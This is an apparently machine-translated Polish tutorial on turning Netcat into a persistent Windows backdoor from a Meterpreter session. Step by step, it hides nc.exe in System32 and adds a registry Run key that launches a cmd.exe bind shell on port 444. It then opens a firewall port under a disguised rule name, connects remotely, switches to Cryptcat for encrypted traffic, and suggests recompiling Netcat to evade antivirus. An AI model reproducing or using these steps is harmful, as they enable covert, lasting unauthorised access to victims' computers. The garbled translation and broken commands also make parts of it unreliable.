Kali Linux netcat trwałe środki

Kali Linux netcat trwałe środki
W tym artykule będziemy przebiegać przez rzeczy, które możesz zrobić z narzędziem sieciowym o nazwie Netcat, szwajcarskim nożem armii narzędzi sieciowych.

Wstęp:

Netcat to narzędzie sieciowe, które może odczytać i zapisywać zarówno do portów UDP, jak i TCP. Jest często określany jako szwajcarski nóż narzędzi do hakowania, ponieważ może robić kilka rzeczy zarówno jako klient, jak i serwer podczas hakerów. Często używamy go do tworzenia okapu powiązanego z powłokami wokół raportów, aby zobaczyć, co się dzieje i wysłać pliki między maszynami. Shell to sposób, w jaki możesz wchodzić w interakcje z komputerem, takim jak wiersz polecenia w systemie Windows lub Terminal w Linux. Netcat pozwala nam wykonywać wiele rzeczy, takich jak odwrotne półki, komunikować się między dwoma lub więcej komputerami i umożliwi wykonanie mnóstwa funkcji. Netcat jest w stanie skanować i łączyć się z otwierającymi porty za pomocą prostych argumentów poleceń. Jest również w stanie wysyłać pliki i zapewnić zdalną administrację za pośrednictwem bezpośredniej lub odwrotnej powłoki.

Zatrudnienie Netcat jako trwałego agenta:

Netcat to niezwykle wszechstronny i użyteczny program. Wspomniałem wcześniej w tym artykule, że służy do komunikacji między dwoma komputerami. Można go również użyć, jeśli chcesz zainstalować trwałość. Netcat może być używany jako backdoor. Zacznijmy więc od utworzenia trwałej powłoki w zagrożonym systemie za pomocą NETCAT. Użyjemy -NC.exe, ponieważ jest nazwa wykonywacza. Ale jeśli zmienisz ją przed użyciem, minimalizuje szanse na wykrycie. Jednak nawet po zmianie nazwy oprogramowania antywirusowego może go wykryć. Wielu hakerów zmienia niektóre elementy kodu źródłowego Netcat, które są niepotrzebne i przed jego użyciem, ponownie skompiluj. Zmiany te sprawią, że Netcat nie jest niewidoczne dla oprogramowania antywirusowego.

Na Kali Netcat jest przechowywany w Binariach/USR/Share/Windows. Aby przesłać go do zagrożonego systemu, użyj polecenia z wewnątrz MeterPreter:

$ MeterPreter> przesyłaj/usr/share/Windows-Binaries/NC.EXE C: \\ Windows \\ System32

W tym folderze jest wiele filetypów, aby ukryć plik w zagrożonym systemie, że jest to najlepsze miejsce

Możesz także użyć trywialnego protokołu przesyłania plików, jeśli nie masz połączenia miernika, aby przesyłać plik.

Następnym krokiem jest skonfigurowanie rejestru, abyś mógł uruchomić NetCat, gdy system uruchomi się i upewnić się, że słucha na porcie 444. Użyj polecenia podanego poniżej:

$ MeterPreter> Reg setval -k hklm \\ oprogramowanie \\ Microsoft \\ Windows \\
CurrentVersion \\ run -vv nc -d 'c: \\ Windows \\ System32 \\ nc.EXE -LDP 444
-e cmd.exe '

Teraz, gdy użyłeś wspomnianego powyżej polecenia, użyj następującego polecenia Queryval, aby upewnić się, że udane wdrożenie zmiany w rejestrze.

$ MeterPreter> Reg Queryval -Khklm \\ Software \\ Microsoft \\ Windows \\
currentverion \\ run -vv nc

Otwórz port w lokalnej zaporze, aby potwierdzić, że zagrożony system zaakceptuje zdalne połączenia z NETCAT za pomocą polecenia $ NETSH. Poznanie systemu operacyjnego celu ma najważniejsze znaczenie. Kontekst wiersza polecenia używany dla systemu Windows Vista, Windows Server 2008, jest

$ netsh advfirewall

W przypadku wcześniejszych systemów używane jest komenda $ NETSH Firewall. Wprowadź polecenie powłoki w wierszu miernika, aby dodać port do lokalnej zapory ogniowej Windows, wprowadź regułę za pomocą odpowiedniego polecenia. W celu prawidłowego funkcjonowania systemu nazwa użytkownika, taka jak „svchostPasshrough” podczas nazywania reguły. Przykładowe polecenie jest pokazane w następujący sposób:

$ C: \ Windows \ System32> Netsh Firewall Dodaj otwarcie portów
TCP 444 „Przejście serwisowe”

Aby potwierdzić, że zmiana została pomyślnie zaimplementowana przy użyciu następującego polecenia:

$ C: \ Windows \ System32> Netsh Firewall Show Port Otwarcie

Po potwierdzeniu reguły portu upewnij się, że opcja ponownego uruchomienia działa.

Wprowadź następujące polecenie z monitu miernika:

$ MeterPreter> Ponowne uruchomienie

Wprowadź następujące polecenie z interaktywnej powłoki Windows:

$ C: \ Windows \ System32> Shutdown -r -t 00

Aby zdalnie uzyskać dostęp do kompromisowego systemu, wpisz $ nc w wierszu poleceń, wskazuj gadatość połączenia (-v i -vv zgłasza podstawowe informacje, odpowiednio znacznie więcej informacji), a następnie wprowadź adres IP docelowego i numer portu.

$ nc -v 192.168.43.128 444

Niestety, Netcat ma pewne ograniczenia, które nie ma uwierzytelniania przesyłanych danych, a oprogramowanie antywirusowe może je wykryć. Jednak problem mniej szyfrowania można rozwiązać za pomocą Cryptcat, co jest alternatywą dla Netcat. Podczas transmisji między wykorzystanym hostem a atakującym zabezpiecza dane za pomocą szyfrowania Twofish. Nie będzie niewłaściwe powiedzieć, że zapewnia to dość silną ochronę zaszyfrowanych danych.

Upewnij się, że jest gotowy i skonfigurowany z silnym hasłem do korzystania z Cryptcat, użyj następującego polecenia:

$ sudo cryptcat -k hasło -l -p 444

Następnym krokiem jest przesłanie Cryptcat do zagrożonego systemu i skonfigurowanie go do połączenia z adresem IP słuchacza za pomocą następującego polecenia:

$ C: \ Cryptcat -k Hasło 444

Niefortunnie jest powiedzieć, że Netcat i jego warianty mogą być wykryte przez oprogramowanie antywirusowe. Korzystając z edytora Hex do zmiany kodu źródłowego NETCAT, istnieje możliwość, że NetCat nie będzie wykryty. Ale jest to długi proces prób i błędów. Bardziej niezawodnym podejściem jest zastosowanie mechanizmów trwałości metasploit ramy.

Wniosek:

Netcat to szwajcarski nóż armii, który jest używany do wydajnego hakowania. Może wykonywać kilka funkcji, aby uzyskać dostęp do serwera i klienta. W tym artykule zawiera krótki opis SFUNT i użycia NETCAT. Mam nadzieję, że ci się podobało, jeśli ten artykuł pomógł ci, podziel się nim z przyjaciółmi. Zapraszam do zapytania o wszelkie zapytania dotyczące Netcat. Możesz także udostępnić swoją opinię i dalsze szczegóły.